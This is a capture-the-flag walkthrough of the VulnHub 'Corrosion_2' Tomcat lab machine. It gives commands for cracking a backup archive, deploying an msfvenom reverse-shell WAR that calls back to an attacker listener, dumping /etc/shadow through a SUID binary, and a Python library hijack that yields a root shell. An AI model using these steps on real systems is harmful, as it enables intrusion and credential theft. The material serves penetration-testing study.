Home Lab Setup Case 1 Case 2 Case 3 HackTheBox Vulnhub Offsec Proving Grounds

Corrosion_2 (VulnHub – Easy)

Corrosion_2 is a Tomcat‑based machine where enumeration quickly reveals a backup archive containing Tomcat credentials. A WAR reverse shell provides initial access, followed by pivoting into a local user and escalating privileges through two separate misconfigurations: a SUID binary capable of reading /etc/shadow, and a Python library hijacking opportunity.

Overview

Target: 10.10.10.12
Initial vector: exposed backup.zip → Tomcat Manager → WAR reverse shell
Lateral movement: user password reuse
Privilege escalation: SUID binary → shadow dump → Python library hijack

Enumeration

Nikto Scan

$ nikto -url http://10.10.10.12:8080

Findings:

Cracking the ZIP Password

$ zip2john backup.zip > hash.txt
$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
-> @administrator_hi5

Extract the archive: 

$ 7z x backup.zip

Inside the backup: 

backup/tomcat-users.xml

Credentials recovered: 

admin | manager : melehifokivai

Login to Tomcat Manager: 

http://10.10.10.12:8080/manager/html

Foothold – Deploying a WAR Reverse Shell

Create a WAR payload:

$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.9 LPORT=443 \
  -f war -o revshell.war

Listener:

$ nc -nlvp 443

Upload and deploy the WAR file via Tomcat Manager, then visit: 

http://10.10.10.12:8080/revshell/

A shell is obtained.

Lateral Movement – User jaye

Inspect /etc/passwd and attempt known credentials: 

$ su jaye
Password: melehifokivai

User jaye shell obtained.

Privilege Escalation

1. SUID Binary → Read /etc/shadow

Enumerate SUID binaries: 

$ find / -perm -4000 2>/dev/null

A suspicious binary appears in /home/jaye/Files/look. Checking GTFOBins reveals it can read arbitrary files.

Dump /etc/shadow:

$ look '' /etc/shadow

Extract randy’s hash and crack it: 

$ john randy_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

Switch user: 

$ su randy

2. Python Library Hijacking (root)

Check sudo permissions: 

$ sudo -l
-> (root) NOPASSWD: /home/randy/randombase64.py

The script imports base64 without specifying a full path. Hijack the import by creating a malicious base64.py earlier in the Python path.

Locate the real library:

$ find / -name "base64.py" 2>/dev/null
-> /usr/lib/python3.8/base64.py

Modify it (or create a malicious version in the working directory): 

import os
os.system("/bin/bash -i")

Execute with sudo: 

$ sudo python3 /home/randy/randombase64.py

A root shell is spawned.

Conclusion

Corrosion_2 combines several classic misconfigurations: exposed Tomcat backups, password reuse, SUID file abuse, and Python library hijacking. The machine demonstrates how a single leaked archive can cascade into full system compromise.